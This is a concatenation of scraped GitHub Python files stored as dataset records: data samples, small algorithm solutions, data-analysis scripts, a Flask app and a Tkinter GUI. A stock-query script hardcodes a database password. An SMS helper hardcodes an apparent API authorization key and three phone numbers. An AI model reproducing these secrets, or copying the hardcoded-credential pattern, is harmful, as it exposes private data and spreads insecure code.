street_name=StreetName(\n value=\"Ludwig-Erhard-Str. 15\"\n ),\n city_name=CityName(\n value=\"Bremen\"\n ),\n country=Country(\n identification_code=IdentificationCode(\n value=\"DE\"\n )\n )\n )\n ),\n estimated_arrival_transport_event=EstimatedArrivalTransportEvent(\n period=[\n Period(\n start_date=XmlDate(2011, 10, 3),\n start_time=XmlTime(18, 30, 10, 0, 60),\n end_date=XmlDate(2011, 10, 3),\n end_time=XmlTime(18, 35, 10, 0, 60)\n ),\n ]\n )\n ),\n ]\n)\n","repo_name":"tefra/xsdata-samples","sub_path":"ubl/samples/UBL-TransportProgressStatus-2.1-Example.py","file_name":"UBL-TransportProgressStatus-2.1-Example.py","file_ext":"py","file_size_in_byte":7198,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"70"}
+{"seq_id":"28213111929","text":"import pymysql\nimport matplotlib.pyplot as plt \nfrom matplotlib.font_manager import FontProperties\nplt.rcParams['font.sans-serif'] = ['SimHei']#中文标签正常使用\nconn = pymysql.connect(\n\thost='localhost',\n\tuser='root',\n\tpassword='wyh19990713',\n\tdatabase='stock',\n charset='utf8')\ncursor = conn.cursor() \nsql = \"select * from data where Date ='2019-3-18' or Date='2019-4-03'\"\ncursor.execute(sql)\nresults = cursor.fetchall()\nconditionStockName=[]\nconditionStockNumber=[]\ni=0\nk=0\nwhile(i0.1)&(finace>0.1)):\n\t\tconditionStockName.append(results[i][6])\n\t\tk=k+1\n\ti+=2\nprint(conditionStockName)\n","repo_name":"wyh196646/bupt-EE-computer-experiment","sub_path":"股票数据分析系统/需求3.py","file_name":"需求3.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"36970186426","text":"'''\n\"I am 25 years and 10 months old\nop: sum of int and avg\n35\n17.5\n\n\nAnjali25 is python4 Expert\n1time3 %times4\n'''\n\"\"\"\nstring = input().split()\nsum = 0\ncount = 0\nfor i in string:\n if(i.isdigit()):\n #print(i)\n sum = sum + int(i)\n count = count + 1\nprint(sum)\nprint(round((sum/count),2))\n\"\"\"\n#################################try with split each item and loop to find the integer in the string if the \n## string has an integer and continuos with a string or a space then the integer is considered\nstring = input().split()\nsum = 0\ncount = 0\n\n\ndef isdigit_fun(word):\n digit = 0\n for c in word:\n if(c.isdigit()):\n digit = digit*10 + int(c)\n return digit\n\n\n#print(string)\ndigi_list = []\nfor word in string:\n digit = isdigit_fun(word)\n if(digit != 0):\n digi_list.append(digit)\n#print(digi_list)\n\ncount = len(digi_list)\n\nfor i in digi_list:\n sum = sum + i\nprint(sum)\nprint(sum/count)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"maheshmahi30/Python_projects","sub_path":"sum_avg_int_in_string_2.py","file_name":"sum_avg_int_in_string_2.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"19514399709","text":"# from flask import Flask, abort, jsonify, request, render_template\nfrom joblib import load\nfrom features import *\nimport json\nimport sys\n\npipeline = load('./pipeline.sav')\n# print(\"chchchchchcchcchchchc\")\n# # app = Flask(__name__)\n\n# @app.route('/analyze', methods=['POST'])\n# def analyze():\n\n# requestJson = request.get_json(force=True)\ncomments = list(sys.argv[1].split(\",\")) # requestJson['arr']\n# comments = json.loads(comments)\n# comments = [{'text': \"good\"}, {'text': \"bad\"}]\n# print(\"coo\", comments)\ngood = 0\nbad = 0\nfor comment in comments:\n query = comment\n query = remove_punctuation_stopwords_lemma(query)\n pred = pipeline.predict([query])\n if pred[0] == \"positive\":\n good += 1\n else:\n bad += 1\n # return jsonify({'good':good,'bad':bad})\n\nresp = {'good': good, 'bad': bad}\nprint(json.dumps(resp))\nsys.stdout.flush()\n# if __name__ == '__main__':\n# app.run(port=8080, debug=True)\n","repo_name":"amardeep5/nutrino","sub_path":"flas.py","file_name":"flas.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"19520669981","text":"from typing import List\nclass Solution:\n def moveZeroes(self, nums: List[int]) -> None:\n \"\"\"\n Do not return anything, modify nums in-place instead.\n \"\"\"\n cur = 0\n for i in range(len(nums)):\n if nums[i] != 0:\n nums[cur] = nums[i]\n cur += 1\n for i in range(cur, len(nums)):\n nums[i] = 0","repo_name":"zhulf0804/Coding.Python","sub_path":"leetcode/283_移动零.py","file_name":"283_移动零.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"69"}
+{"seq_id":"18651660099","text":"import os\nimport re\n\nimport click\nfrom flask import Flask, request, jsonify, send_from_directory\n\nfrom api_account import account_api\nfrom api_admin import admin_api\nfrom api_course import course_api\nfrom api_material import material_api\nfrom api_meta import meta_api\nfrom api_my_submission import my_submission_api\nfrom api_my_team_submission import my_team_submission_api\nfrom api_submission import submission_api\nfrom api_task import task_api\nfrom api_team import team_api\nfrom api_term import term_api\nfrom api_message import message_api\nfrom auth_connect import oauth\nfrom models import db\nfrom services.account import AccountService, AccountServiceError\nfrom services.messsage import MessageService\nfrom utils import upload\nfrom utils.ip import IPTool\n\n\nclass MyFlask(Flask):\n _hashed_static_file_pattern = re.compile(r'^.+\\.[a-z0-9]{20}\\.\\w+$')\n _hashed_static_file_cache_timeout = 365 * 24 * 60 * 60 # 1 year\n _index_page_cache_timeout = 5 * 60 # 5 minutes\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.add_url_rule(\n self.static_url_path + '_/',\n endpoint='region_static',\n view_func=self.send_region_static_file\n )\n\n def send_static_file(self, filename):\n return self.send_region_static_file(filename, None)\n\n def send_region_static_file(self, filename, region):\n \"\"\"Identify hashed static files and send them with a longer cache timeout.\n For 'index.html', send it with a short cache timeout.\n For other static files, the default cache timeout is used.\n \"\"\"\n if not self.has_static_folder:\n raise RuntimeError('No static folder for this object')\n if filename == 'index.html':\n cache_timeout = self._index_page_cache_timeout\n elif self._hashed_static_file_pattern.fullmatch(filename):\n cache_timeout = self._hashed_static_file_cache_timeout\n else:\n cache_timeout = self.get_send_file_max_age(filename)\n\n static_folder = self.get_region_static_folder(region)\n return send_from_directory(static_folder, filename, cache_timeout=cache_timeout)\n\n def get_region_static_folder(self, region):\n if region: # use the static folder for this region\n static_folder = '%s_%s' % (self.static_folder, region)\n else: # use default static folder\n static_folder = self.static_folder\n return static_folder\n\n def get_request_region(self):\n detect_regions = self.config.get('DETECT_REQUEST_REGIONS')\n if detect_regions:\n ip = IPTool.get_client_ip(request)\n country_code = IPTool.get_ip_country(ip)\n if country_code:\n country_code = country_code.lower()\n if country_code in detect_regions:\n return country_code\n return None\n\n\napp = MyFlask(__name__)\napp.config.from_json('config.json')\n\ndb.init_app(app)\nupload.init_app(app)\nIPTool.init_app(app)\n\n# import logging\n# logging.basicConfig()\n# logging.getLogger('sqlalchemy.engine').setLevel(logging.INFO)\n\n\ndef _login_callback(user):\n try:\n AccountService.sync_user(user)\n db.session.commit()\n except AccountServiceError as e:\n return jsonify(msg=e.msg, detail=e.detail), 500\n\n\noauth.init_app(app, login_callback=_login_callback)\n\napp.register_blueprint(account_api, url_prefix='/api/account')\napp.register_blueprint(course_api, url_prefix='/api/courses')\napp.register_blueprint(term_api, url_prefix='/api/terms')\napp.register_blueprint(team_api, url_prefix='/api/teams')\napp.register_blueprint(task_api, url_prefix='/api/tasks')\napp.register_blueprint(material_api, url_prefix='/api/materials')\napp.register_blueprint(submission_api, url_prefix='/api/submissions')\napp.register_blueprint(my_submission_api, url_prefix='/api/my-submissions')\napp.register_blueprint(my_team_submission_api, url_prefix='/api/my-team-submissions')\napp.register_blueprint(message_api, url_prefix='/api/messages')\napp.register_blueprint(meta_api, url_prefix='/api/meta')\napp.register_blueprint(admin_api, url_prefix='/api/admin')\n\n\n@app.route('/')\n@app.route('/terms/')\n@app.route('/admin/')\n@oauth.requires_login\ndef get_index_page(path=''):\n region = app.get_request_region()\n return app.send_region_static_file('index.html', region)\n\n\n@app.errorhandler(404)\ndef page_not_found(error):\n for mime in request.accept_mimetypes:\n if mime[0] == 'text/html':\n break\n if mime[0] == 'application/json':\n return jsonify(msg='wrong url', detail='You have accessed an unknown location'), 404\n region = app.get_request_region()\n # in case we are building the front-end\n if not os.path.exists(os.path.join(app.get_region_static_folder(region), 'index.html')):\n return send_from_directory(app.root_path, 'building.html', cache_timeout=0), 503\n return app.send_region_static_file('index.html', region), 404\n\n\n@app.cli.command()\ndef create_db():\n db.create_all()\n\n\n@app.cli.command()\ndef init_db():\n MessageService.init_default_channels()\n db.session.commit()\n\n\n@app.cli.command()\n@click.option('-c', '--channel_name')\ndef init_email_subscriptions(channel_name: str):\n channel = None\n if channel_name is not None:\n channel = MessageService.get_channel_by_name(channel_name)\n\n for user in AccountService.get_all_users():\n MessageService.init_new_user_subscriptions(user, channel)\n db.session.commit()\n\n\n@app.cli.command()\ndef drop_db():\n db.drop_all()\n\n\nif __name__ == '__main__':\n app.run(host='localhost', port=8888)\n","repo_name":"tjumyk/submit","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":5684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"12441262606","text":"# import required module\r\nimport requests\r\nimport json\r\n\r\n\r\ndef sendSMSToPatient(message=\"Thank you for contacting us. Your appointment has been scheduled successfully\"):\r\n # mention url\r\n url = \"https://www.fast2sms.com/dev/bulkV2\"\r\n\r\n # create a dictionary\r\n my_data = {\r\n # Your default Sender ID\r\n 'sender_id': 'FSTSMS',\r\n\r\n # Put your message here!\r\n 'message': message,\r\n\r\n 'language': 'english',\r\n 'route': 'p',\r\n\r\n # You can send sms to multiple numbers\r\n # separated by comma. ,8669416075,8530695473,8530426407\r\n 'numbers': '8669416075,8530695473,8530426407'\r\n }\r\n\r\n # create a dictionary\r\n headers = {\r\n 'authorization': 'AR2dqJ9iCS0Lux7kTwG1ZDa8UXeIVv3M5tOcpsQnFhmbofjzy6MDNf6FbB8sWzOCdQmG9u0VIeqTJ5Uc',\r\n 'Content-Type': \"application/x-www-form-urlencoded\",\r\n 'Cache-Control': \"no-cache\"\r\n }\r\n\r\n # make a post request\r\n response = requests.request(\"POST\",\r\n url,\r\n data=my_data,\r\n headers=headers)\r\n\r\n # load json data from source\r\n returned_msg = json.loads(response.text)\r\n\r\n # print to send message\r\n print(returned_msg['message'])\r\n","repo_name":"SnehalThakur/RASAChatbots","sub_path":"utils/fast2SmsService.py","file_name":"fast2SmsService.py","file_ext":"py","file_size_in_byte":1267,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"69"}
+{"seq_id":"28960525646","text":"#\n# Autor: Michel\n#\n# Data: 18/12/2022\n\n# Para criar um jogo da velha em Python, você pode seguir os seguintes passos:\n\n# 1.\tCrie uma matriz 3x3 para armazenar os valores das células do jogo da velha. \n# Você pode inicializá-la com todas as células vazias, usando o caractere ' '.\n# 2.\tEscreva uma função que imprima o jogo da velha na tela. Ela deve \n# percorrer a matriz e imprimir os valores das células, separando-as por | e adicionando \n# linhas horizontais para cada linha da matriz.\n# 3.\tEscreva uma função que receba a posição (linha e coluna) e o \n# símbolo (X ou O) e atualize a matriz com o novo valor. Ela deve verificar se a posição é válida (ainda não está ocupada) antes de atualizar a matriz.\n# 4.\tEscreva uma função que verifique se alguém ganhou o jogo. Ela deve \n# verificar as linhas, colunas e diagonais da matriz para ver se algum dos\n# símbolos (X ou O) aparece em todas as células de uma linha, coluna ou diagonal.\n# 5.\tEscreva o loop principal do jogo, que deve solicitar ao \n# jogador qual é a próxima jogada e atualizar a matriz com o novo valor. O loop \n# deve continuar até que alguém ganhe ou até que não hajam mais células vazias (empate).\n\n\n# Jogo da velha em Python\n\n# Criando a matriz 3x3 vazia\nvelha = [[' ' for i in range(3)] for j in range(3)]\n# ou\n# velha = [[' ', ' ', ' '], [' ', ' ', ' '], [' ', ' ', ' ']]\n\n# Função para imprimir o jogo da velha\ndef imprime_velha():\n print('---------')\n for i in range(3):\n print(f'| {velha[i][0]} {velha[i][1]} {velha[i][2]} |')\n print('---------')\n\n# Função para atualizar a matriz do jogo da velha\ndef atualiza_velha(linha, coluna, símbolo):\n if velha[linha][coluna] != ' ':\n print('Posição já ocupada! Escolha outra.')\n return\n velha[linha][coluna] = símbolo\n\n# Função para verificar se alguém ganhou o jogo\ndef verifica_vitória(símbolo):\n # Verificando as linhas\n for i in range(3):\n if velha[i][0] == símbolo and velha[i][1] == símbolo and velha[i][2] == símbolo:\n # return True\n return f'Vencedor:'\n \n \n#####################################################################################\n\nimprime_velha()\natualiza_velha(0, 0, 'X')\nimprime_velha()\natualiza_velha(0, 1, 'X')\natualiza_velha(0, 2, 'X')\nimprime_velha()\nverifica_vitória('X')","repo_name":"MichelZero/JogoDaVelha","sub_path":"jogoVelha-funcao-01.py","file_name":"jogoVelha-funcao-01.py","file_ext":"py","file_size_in_byte":2304,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"30995731160","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jan 24 10:43:25 2018\n\n@author: ernest\n\"\"\"\nimport random\n\ndef afegeixSinonim(diccionari, paraula, sinonim):\n if paraula not in diccionari.keys():\n diccionari[paraula] = [sinonim]\n \n else:\n if sinonim not in diccionari[paraula]:\n diccionari[paraula].append(sinonim)\n\n\n\ndef conversioSinonims(frase, diccionari):\n fraseToRet = []\n\n for word in frase:\n if word in diccionari.keys():\n if len(diccionari[word]) == 1:\n fraseToRet.append(diccionari[word][0])\n \n else:\n fraseToRet.append(diccionari[word][1])\n else:\n fraseToRet.append(word)\n \n return fraseToRet\n\n \n","repo_name":"gaspar44/Laboratorio-de-programacion","sub_path":"Python12/sinonims.py","file_name":"sinonims.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"9499865840","text":"# script which creates a csv file containing players and theier average emotion by channel\nimport os\nimport sys\nimport re\nimport csv\nimport numpy as np\nimport math\nfrom scipy import stats\n\nwalk_dir = sys.argv[1]\n# save_dir = sys.argv[2]\nprint('walk_dir = ' + walk_dir)\nprint('walk_dir (absolute) = ' + os.path.abspath(walk_dir))\n\n\ndef getPlayerLogData(player_file_name):\n\n player_file_name = player_file_name[8:]\n imotions_id = player_file_name[:-4]\n\n player_log_data = []\n\n with open(\"Study6_logdata.csv\") as f:\n tsvin_log = csv.reader(f);\n\n for line in tsvin_log:\n if line[8] == imotions_id:\n player_log_data.append(line)\n\n return player_log_data\n\n\nCollectedMeansAndWeights = []\n\n# parse individual file\ndef getEmotionSummaryStats(file_path, Current_ID):\n #Cutt os file path away from file ID for recording\n m_f_name = re.search('([^\\\\\\\\]+)$', file_path)\n\n new_file_name = ''\n\n if (m_f_name):\n new_file_name = m_f_name.group(0)\n\n level_4_start_time = 0\n\n player_log_data = getPlayerLogData(new_file_name)\n for line in player_log_data:\n if(int(line[2]) == 4):\n level_4_start_time = float(line[3])\n\n #open current log file\n with open(file_path) as f:\n tsvin = csv.reader(f, delimiter='\\t');\n\n\n #filter data for columns with floats and rows that are defined\n #NOTE: Should reject files under a certain threshold of data.\n\n imotions_tsv_sliced = []\n imotions_tsv_unsliced = []\n\n undefined_frame_indexs = []\n\n line_count = 0\n for line in tsvin:\n if (line_count < 6):\n pass\n\n else:\n for i in range (19, 83):\n if line[i]:\n line[i] = float(line[i])\n if line[19] and (float(line[13]) > level_4_start_time):\n imotions_tsv_sliced.append(line[19:83])\n imotions_tsv_unsliced.append(line)\n elif (float(line[13]) > level_4_start_time):\n undefined_frame_indexs.append(line_count);\n imotions_tsv_unsliced.append(line)\n\n line_count += 1\n\n #Create Numpy array\n numpy_imotions_tsv = np.array(imotions_tsv_sliced)\n\n mean = np.mean(numpy_imotions_tsv, axis=0)\n #standard_deviations = np.std(numpy_imotions_tsv, axis=0)\n\n cur_row = [\"Player_\" + str(Current_ID), new_file_name, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\n\n if isinstance(mean, np.ndarray) and len(imotions_tsv_sliced) > 5:\n for i in range (0, 12):\n cur_row[i + 2] = mean[i * 2]\n\n #ignore mean calculations that did not work (bad file or didnt reach last level)\n if(cur_row[3] != 0):\n CollectedMeansAndWeights.append(cur_row)\n\n#Open up each log file from the given study\nfor root, subdirs, files in os.walk(walk_dir):\n # print('--\\nroot = ' + root)\n # list_file_path = os.path.join(root, 'my-directory-list.txt')\n # print('list_file_path = ' + list_file_path)\n\n # with open(list_file_path, 'rb') as list_file:\n # for subdir in subdirs:\n # print('\\t- subdirectory ' + subdir)\n file_count = 1\n\n for filename in files:\n file_path = os.path.join(root, filename)\n\n if \".tsv\" in filename:\n print(file_path)\n getEmotionSummaryStats(file_path, file_count)\n file_count = file_count + 1\n\n print('Total FIles Oppend: ' + str(file_count))\n\n###########################################################################\n#Calculate Average Emotions accross all players by progression\n###########################################################################\n\naverages_p0 = []\naverages_p1 = []\n\nsum_rows_p0 = 0\nsum_rows_p1 = 0\n\nfor row in CollectedMeansAndWeights:\n #Determine which progression this row belongs too.\n player_progression = 2\n\n player_log_data = getPlayerLogData(row[1])\n\n player_progression = int(player_log_data[0][1])\n\n if(player_progression == 0):\n sum_rows_p0 += 1\n\n elif(player_progression == 1):\n sum_rows_p1 += 1\n\n else:\n print(\"error, imotions dump not found in log data.\")\n sys.exit()\n\n #Add to the correct sum array\n for i in range(0, 12):\n if(player_progression == 0):\n averages_p0.append(row[2:])\n\n elif(player_progression == 1):\n averages_p1.append(row[2:])\n\n\n#compute final averages\nfinal_averages_p0 = np.mean(averages_p0, axis=0)\nfinal_averages_p1 = np.mean(averages_p1, axis=0)\n\nt_test = stats.ttest_ind(averages_p0, averages_p1, axis=0)\n\n#Array of tags for printing\nchannels = ['\"Joy Evidence\"', '\"Anger Evidence\"', '\"Surprise Evidence\"', '\"Fear Evidence\"', '\"Contempt Evidence\"', '\"Disgust Evidence\"', '\"Sadness Evidence\"', '\"Confusion Evidence\"', '\"Frustration Evidence\"', '\"Neutral Evidence\"', '\"Positive Evidence\"', '\"Negative Evidence\"']\n\n#Print out final statistics\nprint(\"Averages for progression 0:\")\nfor i in range(0, len(final_averages_p0)):\n print(\"Average of \" + channels[i] + \" Equals: \" + str(final_averages_p0[i]))\n\nprint(\"Averages for progression 1:\")\nfor i in range(0, len(final_averages_p1)):\n print(\"Average of \" + channels[i] + \" Equals: \" + str(final_averages_p1[i]))\n\nprint(\"t-test Results by emotion\")\nfor i in range(0, len(final_averages_p1)):\n print(\"t-test result of \" + channels[i] + \" results: t-statistic: \" + str(t_test[0][i]) + \", p-value: \" + str(t_test[1][i]))","repo_name":"Mistymush/Eukaryote-Research","sub_path":"AverageEmotionsByLevel.py","file_name":"AverageEmotionsByLevel.py","file_ext":"py","file_size_in_byte":5495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"20501583929","text":"# @Date : 23:12 04/04/2020\n# @Author : ClassicalPi\n# @FileName: 5362.py\n# @Software: PyCharm\nimport collections\nclass Solution:\n def canConstruct(self, s: str, k: int) -> bool:\n if k>len(s):\n return False\n elif k==len(s):\n return True\n else:\n dic=collections.Counter(s)\n odd=0\n even=0\n for i in dic.values():\n if i%2==0:\n even+=1\n else:\n odd+=1\n while k>1:\n if odd>0:\n k-=1\n odd-=1\n continue\n else:\n k-=1\n even-=1\n odd+=1\n return (odd==0 or odd==1)\n\nif __name__ == '__main__':\n s=Solution()\n print(s.canConstruct(\"hdafhdajskdajsfbajhfawkfhawdhaiw\",20))","repo_name":"GuoYunZheSE/Leetcode","sub_path":"Contest/04042020/5362/5362.py","file_name":"5362.py","file_ext":"py","file_size_in_byte":886,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"20120244077","text":"from typing import (\n List,\n)\n\nclass MinimumSizeSubarraySum:\n \"\"\"\n @param nums: an array of integers\n @param s: An integer\n @return: an integer representing the minimum size of subarray\n \"\"\"\n def minimum_size(self, nums: List[int], s: int) -> int:\n if not nums:\n return -1\n j, sum = 0, 0\n min_length = float('inf')\n for i in range(len(nums)):\n while j < len(nums) and sum < s:\n sum += nums[j]\n j += 1\n if sum >= s:\n min_length = min(j - i, min_length)\n sum -= nums[i]\n return min_length if min_length != float('inf') else -1\n\n\n def minimum_size2(self, nums: List[int], s: int) -> int:\n presum = self.get_prefix_sum(nums)\n min_size = float('inf')\n for start in range(len(nums)):\n end = self.get_end_of_subarray(presum, start, s)\n if presum[end + 1] - presum[start] >= s:\n min_size = min(end - start + 1, min_size)\n return min_size if min_size != float('inf') else -1\n\n def get_end_of_subarray(self, presum, start, sum):\n left, right = start, len(presum) - 2\n while left + 1 < right:\n mid = (left + right) // 2\n if presum[mid + 1] - presum[start] >= sum:\n right = mid\n else:\n left = mid\n if presum[left + 1] - presum[start] >= sum:\n return left\n return right\n\n\n def get_prefix_sum(self, nums):\n presum = [0]\n for num in nums:\n presum.append(presum[-1] + num)\n return presum\n","repo_name":"entingwu/AlgorithmPython","sub_path":"PrefixSum/MinimumSizeSubarraySum.py","file_name":"MinimumSizeSubarraySum.py","file_ext":"py","file_size_in_byte":1625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"311756646","text":"\"\"\"notifications\n\nRevision ID: 53768f0a4850\nRevises: eecf30892d0e\nCreate Date: 2019-08-06 22:15:04.400982\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '53768f0a4850'\ndown_revision = 'eecf30892d0e'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('notification_subscriptions',\n sa.Column('member', sa.String(length=36), nullable=True),\n sa.Column('freshman_username', sa.String(length=10), nullable=True),\n sa.Column('token', sa.String(length=256), nullable=False),\n sa.ForeignKeyConstraint(['freshman_username'], ['freshman.rit_username'], ),\n sa.PrimaryKeyConstraint('token')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('notification_subscriptions')\n # ### end Alembic commands ###\n\n","repo_name":"ComputerScienceHouse/packet","sub_path":"migrations/versions/53768f0a4850_notifications.py","file_name":"53768f0a4850_notifications.py","file_ext":"py","file_size_in_byte":956,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"69"}
+{"seq_id":"22632553511","text":"#Added by Jan Odenthal, University of Heidelberg, odenthal@stud.uni-heidelberg.de\r\n#Commissioned by Universitätsklinikum Heidelberg, Klinik für Allgemein-, Viszeral- und Transplantationschirurgie\r\n\r\nfrom HyperGuiModules.utility import *\r\nfrom HyperGuiModules.constants import *\r\nfrom tkinter import filedialog, messagebox\r\nfrom PIL import Image, ImageDraw\r\nimport numpy as np\r\nimport os\r\nimport glob\r\nimport shutil\r\nfrom distutils.dir_util import copy_tree\r\n\r\n\r\nclass BP:\r\n def __init__(self, bp_frame):\r\n self.root = bp_frame\r\n \r\n #Lists\r\n self.data_cube_paths = []\r\n self.sub_dirs = []\r\n \r\n # GUI\r\n self.select_data_cube_button = None\r\n self.select_output_dir_button = None\r\n self.render_data_cube_button = None\r\n self.selection_listbox = None\r\n self.data_cube_path_label = None\r\n self.output_dir_label = None\r\n self.delete_button = None\r\n self.data_cube_path_label = None\r\n self.path_label = None\r\n self.save_label = None\r\n\r\n self.original_image_graph = None\r\n self.original_image_data = None\r\n self.original_image = None\r\n self.image_array = None\r\n\r\n self.original_image_graph_r = None\r\n self.original_image_data_r = None\r\n self.original_image_r = None\r\n self.image_array_r = None\r\n\r\n self.tif_save_path_end = None\r\n self.current_dc_path = None\r\n \r\n self.mask_raw = None\r\n \r\n self.idx_dict = dict({0:0})\r\n \r\n self._init_widget()\r\n\r\n\r\n # ---------------------------------------------- UPDATER AND GETTERS ----------------------------------------------\r\n \r\n\r\n def get_selected_data_cube_path(self):\r\n index = self.selection_listbox.curselection()[0]\r\n return self.data_cube_paths[index]\r\n\r\n def get_selected_data_paths(self):\r\n selection = self.selection_listbox.curselection()\r\n selected_data_paths = [self.data_cube_paths[self.idx_dict[i]] for i in selection]\r\n return selected_data_paths\r\n\r\n def update_original_image(self, original_image_data):\r\n self.original_image_data = original_image_data\r\n self._build_original_image(self.original_image_data)\r\n self._draw_points()\r\n \r\n def __update_selected_data_cube(self, event):\r\n if len(self.selection_listbox.curselection())>0:\r\n dc_path = self.get_selected_data_cube_path()\r\n if self.current_dc_path is not self.selection_listbox.curselection()[0]:\r\n if len(self.selection_listbox.curselection())>0:\r\n self.current_dc_path = self.selection_listbox.curselection()[0]\r\n else:\r\n dc_path = self.data_cube_paths[0]\r\n self.current_dc_path = 0\r\n img = Image.open(dc_path)\r\n data1 = np.array(img)\r\n if len(glob.glob(os.path.dirname(dc_path) + \"/*after*\"))>0:\r\n img = Image.open(glob.glob(os.path.dirname(dc_path) + \"/*after*\")[0])\r\n data2 = np.array(img)\r\n else:\r\n data2 = np.zeros((640,480,3))\r\n self._build_original_image_left(data1)\r\n self._build_original_image_right(data2)\r\n \r\n # ------------------------------------------------ INITIALIZATION ------------------------------------------------\r\n\r\n def _init_widget(self):\r\n self._build_selection_box()\r\n self._build_original_image_left(self.original_image_data)\r\n self._build_original_image_right(self.original_image_data)\r\n #self._build_select_superdir_button()\r\n self._build_select_all_subfolders_button()\r\n self._build_trash_button()\r\n self._build_counter(0)\r\n \r\n # ----------------------------------------------- BUILDERS (MISC) -----------------------------------------------\r\n \r\n def _build_trash_button(self):\r\n self.trash_button = make_button(self.root, text='Clean List', width=9, command=self.__trash_list,\r\n row=26, column=1, columnspan=1, inner_pady=5, outer_padx=0,\r\n outer_pady=(10, 15))\r\n\r\n\r\n def _build_select_superdir_button(self):\r\n self.select_data_cube_button = make_button(self.root, text=\"Open OP\\nFolder\",\r\n command=self.__add_data_cube_dirs, inner_padx=10, inner_pady=10,\r\n outer_padx=15, row=25, rowspan = 1, column=0, width=11, outer_pady=(5, 5))\r\n def _build_labelling_entry(self):\r\n labelling_text = make_text(self.root, content = \"File-Filter:\", row=24, column=0, width=14, bg=tkcolour_from_rgb((BACKGROUND)), padx=0, state=NORMAL, pady=0) \r\n self.labelling_entry = make_entry(self.root, row=25, column=0, width=11)\r\n self.labelling_entry.bind(\"\", self.__update_labelling)\r\n \r\n def _build_counter(self, n):\r\n self.lcounter_text = make_text(self.root, content = \"N: \" + str(n), row=23, column=0, width=14, bg=tkcolour_from_rgb((BACKGROUND)), padx=0, state=NORMAL, pady=0) \r\n \r\n def _build_select_all_subfolders_button(self):\r\n self.select_data_cube_button = make_button(self.root, text=\"Open Project\\nFolder\",\r\n command=self.__add_data_cube_subdirs, inner_padx=10, inner_pady=10,\r\n outer_padx=15, row=26, rowspan=1, column=0, width=11, outer_pady=(5, 5))\r\n\r\n\r\n\r\n def _build_selection_box(self):\r\n self.selection_listbox = make_listbox(self.root, row=2, column=0, rowspan=21, padx=(0, 15), pady=(0, 15), height = 35, selectmode = \"SINGLE\")\r\n self.selection_listbox.bind('<>', self.__update_selected_data_cube)\r\n \r\n # ---------------------------------------------- IMAGE -----------------------------------------------\r\n \r\n def _build_original_image_left(self, data):\r\n if data is None:\r\n # Placeholder\r\n self.original_image = make_label(self.root, \"Navigation:\\n Mouse-Left or 'q' to place point\\n '+' or 'w' to zoom in\\n '-' or 's' to zoom out\\n arrows to change image\", row=1, column=1, rowspan=25,\r\n columnspan=1, inner_pady=30, inner_padx=40, outer_padx=(15, 10),\r\n outer_pady=(15, 10))\r\n else:\r\n #data = np.asarray(rgb_image_to_hsi_array(self.original_image_data)).reshape((480, 640))\r\n (self.original_image_graph, self.original_image, self.image_array) = \\\r\n make_image(self.root, data, row=1, column=1, columnspan=1, rowspan=25, lower_scale_value=None,\r\n upper_scale_value=None, color_rgb=BACKGROUND, original=True, figheight=3.5, figwidth=4.5, img = self.original_image, axs = self.original_image_graph, figu = self.original_image_graph)\r\n self.root.bind_all('', self.__next_not)\r\n self.root.bind_all('', self.__next_hot)\r\n self.root.bind_all('1', self.__next_one)\r\n self.root.bind_all('2', self.__next_two)\r\n #self.original_image.get_tk_widget().bind('', self.__update_cursor)\r\n self.original_image.get_tk_widget().focus_force()\r\n \r\n def _build_original_image_right(self, data):\r\n if data is None:\r\n # Placeholder\r\n self.original_image_r = make_label(self.root, \"Navigation:\\n Mouse-Left or 'q' to place point\\n '+' or 'w' to zoom in\\n '-' or 's' to zoom out\\n arrows to change image\", row=1, column=2, rowspan=25,\r\n columnspan=1, inner_pady=30, inner_padx=40, outer_padx=(15, 10),\r\n outer_pady=(15, 10))\r\n else:\r\n #data = np.asarray(rgb_image_to_hsi_array(self.original_image_data)).reshape((480, 640))\r\n (self.original_image_graph_r, self.original_image_r, self.image_array_r) = \\\r\n make_image(self.root, data, row=1, column=2, columnspan=1, rowspan=25, lower_scale_value=None,\r\n upper_scale_value=None, color_rgb=BACKGROUND, original=True, figheight=3.5, figwidth=4.5, img = self.original_image_r, axs = self.original_image_graph_r, figu = self.original_image_graph_r) \r\n \r\n def __add_from_data_cube_paths(self, event = None):\r\n self.selection_listbox.delete(0,'end')\r\n cc=0\r\n for dc_path in self.data_cube_paths:\r\n concat_path = os.path.basename(os.path.normpath(dc_path)) \r\n self.selection_listbox.insert(END, 